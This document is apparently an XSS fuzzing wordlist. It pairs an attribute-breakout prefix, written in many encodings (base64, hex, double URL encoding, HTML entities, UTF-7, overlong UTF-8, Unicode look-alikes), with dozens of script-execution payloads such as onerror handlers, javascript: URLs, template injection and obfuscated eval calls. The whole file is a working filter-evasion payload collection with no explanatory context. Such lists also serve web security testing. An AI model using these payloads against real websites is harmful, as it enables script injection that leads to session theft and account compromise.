Ii8+document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
Ii8+import('data:,alert(1)')
Ii8+setTimeout("alert(1)")
Ii8+location=javascript:alert(1)
Ii8+<svg/onload=alert(1)>
Ii8+<img src=x onerror=alert(1)>
Ii8+{{constructor.constructor('alert(1)')()}}
Ii8+$.getScript('data:,alert(1)')
Ii8+<a id=alert><a id=alert name=href>javascript:alert(1)
Ii8+trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
Ii8+navigator.serviceWorker.register('data:,alert(1)')
Ii8+fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
Ii8+<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
Ii8+Function("al"+"ert(1)")()
Ii8+Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
Ii8+eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
Ii8+setTimeout("alert(1)",0)
Ii8+<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
Ii8+<svg/onload=alert(1)>
Ii8+location="javascript:alert(1)"
Ii8+document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

IkgvPg==
IkgvPg==alert(1)
IkgvPg=={alert(1)}
IkgvPg==onerror=alert;throw 1
IkgvPg==new Function`alert\`1\```
IkgvPg==Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
IkgvPg==eval(String.fromCharCode(97,108,101,114,116,40,49,41))
IkgvPg==document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
IkgvPg==document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
IkgvPg==import('data:,alert(1)')
IkgvPg==setTimeout("alert(1)")
IkgvPg==location=javascript:alert(1)
IkgvPg==<svg/onload=alert(1)>
IkgvPg==<img src=x onerror=alert(1)>
IkgvPg=={{constructor.constructor('alert(1)')()}}
IkgvPg==$.getScript('data:,alert(1)')
IkgvPg==<a id=alert><a id=alert name=href>javascript:alert(1)
IkgvPg==trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
IkgvPg==navigator.serviceWorker.register('data:,alert(1)')
IkgvPg==fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
IkgvPg==<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
IkgvPg==Function("al"+"ert(1)")()
IkgvPg==Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
IkgvPg==eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
IkgvPg==setTimeout("alert(1)",0)
IkgvPg==<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
IkgvPg==<svg/onload=alert(1)>
IkgvPg==location="javascript:alert(1)"
IkgvPg==document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

0x220x2F0x3E
0x220x2F0x3Ealert(1)
0x220x2F0x3E{alert(1)}
0x220x2F0x3Eonerror=alert;throw 1
0x220x2F0x3Enew Function`alert\`1\```
0x220x2F0x3EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
0x220x2F0x3Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
0x220x2F0x3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
0x220x2F0x3Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
0x220x2F0x3Eimport('data:,alert(1)')
0x220x2F0x3EsetTimeout("alert(1)")
0x220x2F0x3Elocation=javascript:alert(1)
0x220x2F0x3E<svg/onload=alert(1)>
0x220x2F0x3E<img src=x onerror=alert(1)>
0x220x2F0x3E{{constructor.constructor('alert(1)')()}}
0x220x2F0x3E$.getScript('data:,alert(1)')
0x220x2F0x3E<a id=alert><a id=alert name=href>javascript:alert(1)
0x220x2F0x3EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
0x220x2F0x3Enavigator.serviceWorker.register('data:,alert(1)')
0x220x2F0x3Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
0x220x2F0x3E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
0x220x2F0x3EFunction("al"+"ert(1)")()
0x220x2F0x3EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
0x220x2F0x3Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
0x220x2F0x3EsetTimeout("alert(1)",0)
0x220x2F0x3E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
0x220x2F0x3E<svg/onload=alert(1)>
0x220x2F0x3Elocation="javascript:alert(1)"
0x220x2F0x3Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

\x22\x2F\x3E
\x22\x2F\x3Ealert(1)
\x22\x2F\x3E{alert(1)}
\x22\x2F\x3Eonerror=alert;throw 1
\x22\x2F\x3Enew Function`alert\`1\```
\x22\x2F\x3EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
\x22\x2F\x3Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
\x22\x2F\x3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
\x22\x2F\x3Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
\x22\x2F\x3Eimport('data:,alert(1)')
\x22\x2F\x3EsetTimeout("alert(1)")
\x22\x2F\x3Elocation=javascript:alert(1)
\x22\x2F\x3E<svg/onload=alert(1)>
\x22\x2F\x3E<img src=x onerror=alert(1)>
\x22\x2F\x3E{{constructor.constructor('alert(1)')()}}
\x22\x2F\x3E$.getScript('data:,alert(1)')
\x22\x2F\x3E<a id=alert><a id=alert name=href>javascript:alert(1)
\x22\x2F\x3EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
\x22\x2F\x3Enavigator.serviceWorker.register('data:,alert(1)')
\x22\x2F\x3Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
\x22\x2F\x3E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
\x22\x2F\x3EFunction("al"+"ert(1)")()
\x22\x2F\x3EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
\x22\x2F\x3Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
\x22\x2F\x3EsetTimeout("alert(1)",0)
\x22\x2F\x3E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
\x22\x2F\x3E<svg/onload=alert(1)>
\x22\x2F\x3Elocation="javascript:alert(1)"
\x22\x2F\x3Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")
%2522%252F%253Ealert(1)
%2522%252F%253E{alert(1)}
%2522%252F%253Eonerror=alert;throw 1
%2522%252F%253Enew Function`alert\`1\```
%2522%252F%253EFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%2522%252F%253Eeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%2522%252F%253Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%2522%252F%253Edocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%2522%252F%253Eimport('data:,alert(1)')
%2522%252F%253EsetTimeout("alert(1)")
%2522%252F%253Elocation=javascript:alert(1)
%2522%252F%253E<svg/onload=alert(1)>
%2522%252F%253E<img src=x onerror=alert(1)>
%2522%252F%253E{{constructor.constructor('alert(1)')()}}
%2522%252F%253E$.getScript('data:,alert(1)')
%2522%252F%253E<a id=alert><a id=alert name=href>javascript:alert(1)
%2522%252F%253EtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%2522%252F%253Enavigator.serviceWorker.register('data:,alert(1)')
%2522%252F%253Efetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%2522%252F%253E<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%2522%252F%253EFunction("al"+"ert(1)")()
%2522%252F%253EFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%2522%252F%253Eeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%2522%252F%253EsetTimeout("alert(1)",0)
%2522%252F%253E<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%2522%252F%253E<svg/onload=alert(1)>
%2522%252F%253Elocation="javascript:alert(1)"
%2522%252F%253Edocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%25%32%32%25%32%46%25%33%45alert(1)
%25%32%32%25%32%46%25%33%45{alert(1)}
%25%32%32%25%32%46%25%33%45onerror=alert;throw 1
%25%32%32%25%32%46%25%33%45new Function`alert\`1\```
%25%32%32%25%32%46%25%33%45Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
%25%32%32%25%32%46%25%33%45eval(String.fromCharCode(97,108,101,114,116,40,49,41))
%25%32%32%25%32%46%25%33%45document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%25%32%32%25%32%46%25%33%45document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%25%32%32%25%32%46%25%33%45import('data:,alert(1)')
%25%32%32%25%32%46%25%33%45setTimeout("alert(1)")
%25%32%32%25%32%46%25%33%45location=javascript:alert(1)
%25%32%32%25%32%46%25%33%45<svg/onload=alert(1)>
%25%32%32%25%32%46%25%33%45<img src=x onerror=alert(1)>
%25%32%32%25%32%46%25%33%45{{constructor.constructor('alert(1)')()}}
%25%32%32%25%32%46%25%33%45$.getScript('data:,alert(1)')
%25%32%32%25%32%46%25%33%45<a id=alert><a id=alert name=href>javascript:alert(1)
%25%32%32%25%32%46%25%33%45trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%25%32%32%25%32%46%25%33%45navigator.serviceWorker.register('data:,alert(1)')
%25%32%32%25%32%46%25%33%45fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%25%32%32%25%32%46%25%33%45<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%25%32%32%25%32%46%25%33%45Function("al"+"ert(1)")()
%25%32%32%25%32%46%25%33%45Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%25%32%32%25%32%46%25%33%45eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%25%32%32%25%32%46%25%33%45setTimeout("alert(1)",0)
%25%32%32%25%32%46%25%33%45<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%25%32%32%25%32%46%25%33%45<svg/onload=alert(1)>
%25%32%32%25%32%46%25%33%45location="javascript:alert(1)"
%25%32%32%25%32%46%25%33%45document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

&amp;%23x22;&amp;%23x2F;&amp;%23x3E;alert(1)
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;{alert(1)}
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;onerror=alert;throw 1
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;new Function`alert\`1\```
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;eval(String.fromCharCode(97,108,101,114,116,40,49,41))
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;import('data:,alert(1)')
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;setTimeout("alert(1)")
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;location=javascript:alert(1)
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<svg/onload=alert(1)>
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<img src=x onerror=alert(1)>
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;{{constructor.constructor('alert(1)')()}}
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;$.getScript('data:,alert(1)')
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<a id=alert><a id=alert name=href>javascript:alert(1)
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;navigator.serviceWorker.register('data:,alert(1)')
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;Function("al"+"ert(1)")()
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;setTimeout("alert(1)",0)
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;<svg/onload=alert(1)>
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;location="javascript:alert(1)"
&amp;%23x22;&amp;%23x2F;&amp;%23x3E;document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45alert(1)
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45{alert(1)}
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45onerror=alert;throw 1
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45new Function`alert\`1\```
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45eval(String.fromCharCode(97,108,101,114,116,40,49,41))
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45import('data:,alert(1)')
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45setTimeout("alert(1)")
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45location=javascript:alert(1)
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<svg/onload=alert(1)>
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<img src=x onerror=alert(1)>
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45{{constructor.constructor('alert(1)')()}}
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45$.getScript('data:,alert(1)')
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<a id=alert><a id=alert name=href>javascript:alert(1)
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45navigator.serviceWorker.register('data:,alert(1)')
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45Function("al"+"ert(1)")()
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45setTimeout("alert(1)",0)
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45<svg/onload=alert(1)>
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45location="javascript:alert(1)"
%25%75%30%30%32%32%25%75%30%30%32%46%25%75%30%30%33%45document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

+ACIAPg-alert(1)
+ACIAPg-{alert(1)}
+ACIAPg-onerror=alert;throw 1
+ACIAPg-new Function`alert\`1\```
+ACIAPg-Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
+ACIAPg-eval(String.fromCharCode(97,108,101,114,116,40,49,41))
+ACIAPg-document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
+ACIAPg-document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
+ACIAPg-import('data:,alert(1)')
+ACIAPg-setTimeout("alert(1)")
+ACIAPg-location=javascript:alert(1)
+ACIAPg-<svg/onload=alert(1)>
+ACIAPg-<img src=x onerror=alert(1)>
+ACIAPg-{{constructor.constructor('alert(1)')()}}
+ACIAPg-$.getScript('data:,alert(1)')
+ACIAPg-<a id=alert><a id=alert name=href>javascript:alert(1)
+ACIAPg-trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
+ACIAPg-navigator.serviceWorker.register('data:,alert(1)')
+ACIAPg-fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
+ACIAPg-<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
+ACIAPg-Function("al"+"ert(1)")()
+ACIAPg-Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
+ACIAPg-eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
+ACIAPg-setTimeout("alert(1)",0)
+ACIAPg-<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
+ACIAPg-<svg/onload=alert(1)>
+ACIAPg-location="javascript:alert(1)"
+ACIAPg-document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

᠔ᠾᠽalert(1)
᠔ᠾᠽ{alert(1)}
᠔ᠾᠽonerror=alert;throw 1
᠔ᠾᠽnew Function`alert\`1\```
᠔ᠾᠽFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
᠔ᠾᠽeval(String.fromCharCode(97,108,101,114,116,40,49,41))
᠔ᠾᠽdocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
᠔ᠾᠽdocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
᠔ᠾᠽimport('data:,alert(1)')
᠔ᠾᠽsetTimeout("alert(1)")
᠔ᠾᠽlocation=javascript:alert(1)
᠔ᠾᠽ<svg/onload=alert(1)>
᠔ᠾᠽ<img src=x onerror=alert(1)>
᠔ᠾᠽ{{constructor.constructor('alert(1)')()}}
᠔ᠾᠽ$.getScript('data:,alert(1)')
᠔ᠾᠽ<a id=alert><a id=alert name=href>javascript:alert(1)
᠔ᠾᠽtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
᠔ᠾᠽnavigator.serviceWorker.register('data:,alert(1)')
᠔ᠾᠽfetch('https://trusted-site.com/jsonp?callback=alert(1)//')
᠔ᠾᠽ<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
᠔ᠾᠽFunction("al"+"ert(1)")()
᠔ᠾᠽFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
᠔ᠾᠽeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
᠔ᠾᠽsetTimeout("alert(1)",0)
᠔ᠾᠽ<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
᠔ᠾᠽ<svg/onload=alert(1)>
᠔ᠾᠽlocation="javascript:alert(1)"
᠔ᠾᠽdocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

﹍∕﹥alert(1)
﹍∕﹥{alert(1)}
﹍∕﹥onerror=alert;throw 1
﹍∕﹥new Function`alert\`1\```
﹍∕﹥Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
﹍∕﹥eval(String.fromCharCode(97,108,101,114,116,40,49,41))
﹍∕﹥document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
﹍∕﹥document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
﹍∕﹥import('data:,alert(1)')
﹍∕﹥setTimeout("alert(1)")
﹍∕﹥location=javascript:alert(1)
﹍∕﹥<svg/onload=alert(1)>
﹍∕﹥<img src=x onerror=alert(1)>
﹍∕﹥{{constructor.constructor('alert(1)')()}}
﹍∕﹥$.getScript('data:,alert(1)')
﹍∕﹥<a id=alert><a id=alert name=href>javascript:alert(1)
﹍∕﹥trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
﹍∕﹥navigator.serviceWorker.register('data:,alert(1)')
﹍∕﹥fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
﹍∕﹥<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
﹍∕﹥Function("al"+"ert(1)")()
﹍∕﹥Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
﹍∕﹥eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
﹍∕﹥setTimeout("alert(1)",0)
﹍∕﹥<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
﹍∕﹥<svg/onload=alert(1)>
﹍∕﹥location="javascript:alert(1)"
﹍∕﹥document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

／＞alert(1)
／＞{alert(1)}
／＞onerror=alert;throw 1
／＞new Function`alert\`1\```
／＞Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
／＞eval(String.fromCharCode(97,108,101,114,116,40,49,41))
／＞document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
／＞document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
／＞import('data:,alert(1)')
／＞setTimeout("alert(1)")
／＞location=javascript:alert(1)
／＞<svg/onload=alert(1)>
／＞<img src=x onerror=alert(1)>
／＞{{constructor.constructor('alert(1)')()}}
／＞$.getScript('data:,alert(1)')
／＞<a id=alert><a id=alert name=href>javascript:alert(1)
／＞trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
／＞navigator.serviceWorker.register('data:,alert(1)')
／＞fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
／＞<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
／＞Function("al"+"ert(1)")()
／＞Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
／＞eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
／＞setTimeout("alert(1)",0)
／＞<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
／＞<svg/onload=alert(1)>
／＞location="javascript:alert(1)"
／＞document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

𝄞𝄿𝅀alert(1)
𝄞𝄿𝅀{alert(1)}
𝄞𝄿𝅀onerror=alert;throw 1
𝄞𝄿𝅀new Function`alert\`1\```
𝄞𝄿𝅀Function(String.fromCharCode(97,108,101,114,116,40,49,41))()
𝄞𝄿𝅀eval(String.fromCharCode(97,108,101,114,116,40,49,41))
𝄞𝄿𝅀document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
𝄞𝄿𝅀document.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
𝄞𝄿𝅀import('data:,alert(1)')
𝄞𝄿𝅀setTimeout("alert(1)")
𝄞𝄿𝅀location=javascript:alert(1)
𝄞𝄿𝅀<svg/onload=alert(1)>
𝄞𝄿𝅀<img src=x onerror=alert(1)>
𝄞𝄿𝅀{{constructor.constructor('alert(1)')()}}
𝄞𝄿𝅀$.getScript('data:,alert(1)')
𝄞𝄿𝅀<a id=alert><a id=alert name=href>javascript:alert(1)
𝄞𝄿𝅀trustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
𝄞𝄿𝅀navigator.serviceWorker.register('data:,alert(1)')
𝄞𝄿𝅀fetch('https://trusted-site.com/jsonp?callback=alert(1)//')
𝄞𝄿𝅀<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
𝄞𝄿𝅀Function("al"+"ert(1)")()
𝄞𝄿𝅀Function("\x61\x6c\x65\x72\x74\x28\x31\x29")()
𝄞𝄿𝅀eval("\x61\x6c\x65\x72\x74\x28\x31\x29")
𝄞𝄿𝅀setTimeout("alert(1)",0)
𝄞𝄿𝅀<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
𝄞𝄿𝅀<svg/onload=alert(1)>
𝄞𝄿𝅀location="javascript:alert(1)"
𝄞𝄿𝅀document.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

%C0%A2%C0%AF%C0%BEalert(1)
%C0%A2%C0%AF%C0%BE{alert(1)}
%C0%A2%C0%AF%C0%BEonerror=alert;throw 1
%C0%A2%C0%AF%C0%BEnew Function`alert\`1\```
%C0%A2%C0%AF%C0%BEFunction(String.fromCharCode(97,108,101,114,116,40,49,41))()
%C0%A2%C0%AF%C0%BEeval(String.fromCharCode(97,108,101,114,116,40,49,41))
%C0%A2%C0%AF%C0%BEdocument.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62))
%C0%A2%C0%AF%C0%BEdocument.body.innerHTML=atob("PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==")
%C0%A2%C0%AF%C0%BEimport('data:,alert(1)')
%C0%A2%C0%AF%C0%BEsetTimeout("alert(1)")
%C0%A2%C0%AF%C0%BElocation=javascript:alert(1)
%C0%A2%C0%AF%C0%BE<svg/onload=alert(1)>
%C0%A2%C0%AF%C0%BE<img src=x onerror=alert(1)>
%C0%A2%C0%AF%C0%BE{{constructor.constructor('alert(1)')()}}
%C0%A2%C0%AF%C0%BE$.getScript('data:,alert(1)')
%C0%A2%C0%AF%C0%BE<a id=alert><a id=alert name=href>javascript:alert(1)
%C0%A2%C0%AF%C0%BEtrustedTypes.defaultPolicy.createHTML('<img src=x onerror=alert(1)>')
%C0%A2%C0%AF%C0%BEnavigator.serviceWorker.register('data:,alert(1)')
%C0%A2%C0%AF%C0%BEfetch('https://trusted-site.com/jsonp?callback=alert(1)//')
%C0%A2%C0%AF%C0%BE<script src="data:text/javascript;base64,YWxlcnQoMSk="></script>
%C0%A2%C0%AF%C0%BEFunction("al"+"ert(1)")()
%C0%A2%C0%AF%C0%BEFunction("\x61\x6c\x65\x72\x74\x28\x31\x29")()
%C0%A2%C0%AF%C0%BEeval("\x61\x6c\x65\x72\x74\x28\x31\x29")
%C0%A2%C0%AF%C0%BEsetTimeout("alert(1)",0)
%C0%A2%C0%AF%C0%BE<img src=x onerror=eval("\x61\x6c\x65\x72\x74\x28\x31\x29")>
%C0%A2%C0%AF%C0%BE<svg/onload=alert(1)>
%C0%A2%C0%AF%C0%BElocation="javascript:alert(1)"
%C0%A2%C0%AF%C0%BEdocument.write("\x3c\x73\x63\x72\x69\x70\x74\x3e\x61\x6c\x65\x72\x74\x28\x31\x29\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e")

